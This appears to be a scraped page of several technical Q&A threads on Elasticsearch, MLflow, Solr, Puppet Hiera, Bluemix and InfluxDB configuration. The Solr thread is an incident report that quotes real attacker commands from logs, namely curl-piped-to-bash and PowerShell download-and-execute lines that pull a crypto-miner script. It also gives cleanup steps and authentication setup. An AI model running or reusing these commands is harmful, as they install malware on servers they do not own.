elasticsearch index in production profile in jhipster - jhipster

I have configured my application-prod.yml with the installed elasticsearch's elasticsearch.yml.
when we run mvn -Pprod (running the jhipster app in prod profile),app is running without error. But I don't know where is the elasticsearch index created.
When I search in browser localhost:1000/_cat/indices?v it doesn't show anything as there is no index present. But when I'm creating a row in entity it is created and after searching the same index it shows result.In my node it is not present.
I want to know in prod profile how the elastisearch index is created and stored.
here is changes done by me in application-prod.yml for elasticsearch.
file:application-prod.yml
data:
elasticsearch:
cluster-name:my-application
cluster-nodes:localhost:1000
file:elasticsearch.yml
cluster.name: my-application
node.name: mynode
path.data: W:\Apurva\ElasticSearch\elasticsearch-5.1.2\data
path.logs: W:\Apurva\ElasticSearch\elasticsearch-5.1.2\logs
http.port: 1000

Related

Mlflow - empty artifact folder

All,
I started the mlflow server as below. I do see the backend store containing the expected metadata. However, the artifact folder is empty despite many runs.
> mlflow server --backend-store-uri mlflow_db --default-artifact-root
> ./mlflowruns --host 0.0.0.0 --port 5000
The mlflow ui has the below message for the artifacts section:
No Artifacts Recorded
Use the log artifact APIs to store file outputs from MLflow runs.
What am I doing wrong?
Thanks,
grajee
Turns out that
"--backend-store-uri mlflow_db" was pointing to D:\python\Pythonv395\Scripts\mlflow_db
and
"--default-artifact-root ./mlflowruns" was pointing to D:\DataEngineering\MlFlow\Wine Regression\mlflowruns which is the project folder.
I was able to point both the output to one folder with the following syntax
file:/D:/DataEngineering/MlFlow/Wine Regression
In case you want to log artifacts to your server with local file system as object storage, you should specify --serve-artifact --artifact-destination file:/path/to/your/desired/location instead of just a vanilla path.

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes

Puppet enterprise error while running "puppet agent -t" commnad, unable to get User/Group data from hieara

I have Puppet enterprise installed on my VM, running in Virtualbox.
The installation went fine, but when I try to run the command puppet agent -t I get the following error:
[root#puppetmaster ~]# puppet agent -t
Info: Using configured environment 'production'
Info: Retrieving pluginfacts
Info: Retrieving plugin
Info: Loading facts
Error: Could not retrieve catalog from remote server: Error 500 on SERVER: Server Error: Evaluation Error: Error while evaluating a Function Call, Could not find data item role in any Hiera data file and no default supplied at /etc/puppetlabs/code/environments/production/manifests/site.pp:32:10 on node puppetmaster.localdomain
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run
Here is my site.pp file line where the error is coming from;
## site.pp ##
# This file (/etc/puppetlabs/puppet/manifests/site.pp) is the main entry point
# used when an agent connects to a master and asks for an updated configuration.
#
# Global objects like filebuckets and resource defaults should go in this file,
# as should the default node definition. (The default node can be omitted
# if you use the console and don't define any other nodes in site.pp. See
# http://docs.puppetlabs.com/guides/language_guide.html#nodes for more on
# node definitions.)
## Active Configurations ##
# Disable filebucket by default for all File resources:
#http://docs.puppetlabs.com/pe/latest/release_notes.html#filebucket-resource-no-longer-created-by-default
File { backup => false }
# DEFAULT NODE
# Node definitions in this file are merged with node data from the console. See
# http://docs.puppetlabs.com/guides/language_guide.html#nodes for more on
# node definitions.
# The default node definition matches any node lacking a more specific node
# definition. If there are no other nodes in this file, classes declared here
# will be included in every node's catalog, *in addition* to any classes
# specified in the console for that node.
node default {
# This is where you can declare classes for all nodes.
# Example:
# class { 'my_class': }
$role = hiera('role')
$location = hiera('location')
notify{"in the top level site.pp : role is '${role}', location is '${location}'": }
include "::roles::${role}"
}
If you look at the error, it can't find the hiera key that you've asked for in your site.pp:
Could not find data item role in any Hiera data file and no default supplied at /etc/puppetlabs/code/environments/production/manifests/site.pp:32:10 on node puppetmaster.localdomain
In your code, you have the following:
$role = hiera('role')
$location = hiera('location')
Both of these are hiera calls, that require that hiera is setup and that the relevant key is in a hieradata folder.
A useful tool to help you diagnose hiera issues is hiera_explain, which shows you how your hiera hierarchy is setup and configured, and might help explain what the issue is with your code.

Node.js cannot find mysql-database service

I'm trying to follow the tutorial noted below:
http://www.ibm.com/developerworks/cloud/library/cl-bluemix-nodejs-app/
But when I push my app, I see the following:
Using manifest file /mytests/bluemix-node-mysql-upload/manifest.yml
Updating app jea-node-mysql-upload in org jea68#gmail.com / space dev as jea68#gmail.com...
OK
Uploading jea-node-mysql-upload...
Uploading app files from: /mytests/bluemix-node-mysql-upload/app
Uploading 53.6K, 11 files
Done uploading
OK
FAILED
Could not find service mysql-database to bind to jea-node-mysql-upload
Is there a problem with the node.js buildpack or is the documentation faulty?
I've been able to push apps to Node.js without any problems this morning. The documentation assumes the user knows that the service has already been created. The manifest.yml included in the github repo of the tutorial defines a service (mysql-database) that has not been created. Run the following command to create the service:
$ cf create-service mysql 100 jea-mysql-node-upload-service
Then modify the manifest.yml to include:
services:
- jea-mysql-node-upload-service
Alternatively, since you already have an app, you can bind the application to the service by running the following:
$ cf bind-service jea-node-mysql-upload jea-mysql-node-upload-service
$ cf start jea-node-mysql-upload
It looks like a fault in the documentation. If you look at Step 2 part 3 it says to create the my-sql service using this command:
cf create-service mysql 100 mysql-node-upload
which will name the service instance as mysql-node-upload, however the manifest.yml file that you cloned from github contains the service name of just mysql-service. It is the manifest.yml file that links the app with the service instance.
The options are either the change the manifest.yml file to be the correct name of your mysql service instance or recreate the mysql service instance with the name that is in your manifest.yml.

How to change location of Influxdb storage folder?

I've Installed package from the official site by instruction. By default the physical destination of database folder is /opt/influxdb/shared.
I've tried to change properties of config file and written it properly. But after that I can't start the influxdb service.
[storage]
dir = "/media/alex/Second/InfluxStorage/data/db" //my settings
How I can change the default database directory ?
EDIT: This is for InfluxDB v1.x only. It has been reported to not work for InfluxDB v2.x.
Make a new directory where you want to put your data and set the appropriate permissions, e.g.:
mkdir /new/path/to/influxdb
sudo chown influxdb:influxdb influxdb
Edit the following three lines of your /etc/influxdb/influxdb.conf (/usr/local/etc/influxdb.conf on macOS) so that they point to your new location:
# under [meta]
dir = "/new/path/to/influxdb/meta"
# under [data]
dir = "/new/path/to/influxdb/data"
wal-dir = "/new/path/to/influxdb/wal"
Restart the InfluxDB daemon.
sudo service influxdb restart # Ubuntu/Debian
brew services restart influxdb # macOS/homebrew
Done!
In case you want to move existing data, just simply copy the existing data (location can be found at influxdb.conf; /var/lib/influxdb on Ubuntu/Debian) to your new desired location before editing influxdb.conf and make sure the new folder has the appropriate permissions/ownership.
There is some information about backups/restores on the official docs, however just plain copying worked for me.
The above was tested on InfluxDB v1.2 on macOS/Ubuntu/Raspbian.
For InfluxDB 2.0:
In InfluxDB 2.0 the data directories are below ~/.influxdbv2 by default.
Actually, there are 2 data storages for bolt (various key-value configurations) and engine (the TSM database).
From the documentation, to change the location to the bolt database:
Default: ~/.influxdbv2/influxd.bolt
influxd flag: influxd --bolt-path=~/.influxdbv2/influxd.bolt
Environment variable: export INFLUXD_BOLT_PATH=~/.influxdbv2/influxd.bolt
Configuration file: bolt-path: /users/user/.influxdbv2/influxd.bolt
From the documentation, to change the location to the engine database:
Default: ~/.influxdbv2/engine
influxd flag: influxd --engine-path=~/.influxdbv2/engine
Environment variable: export INFLUXD_ENGINE_PATH=~/.influxdbv2/engine
Configuration file: engine-path: /users/user/.influxdbv2/engine

Resources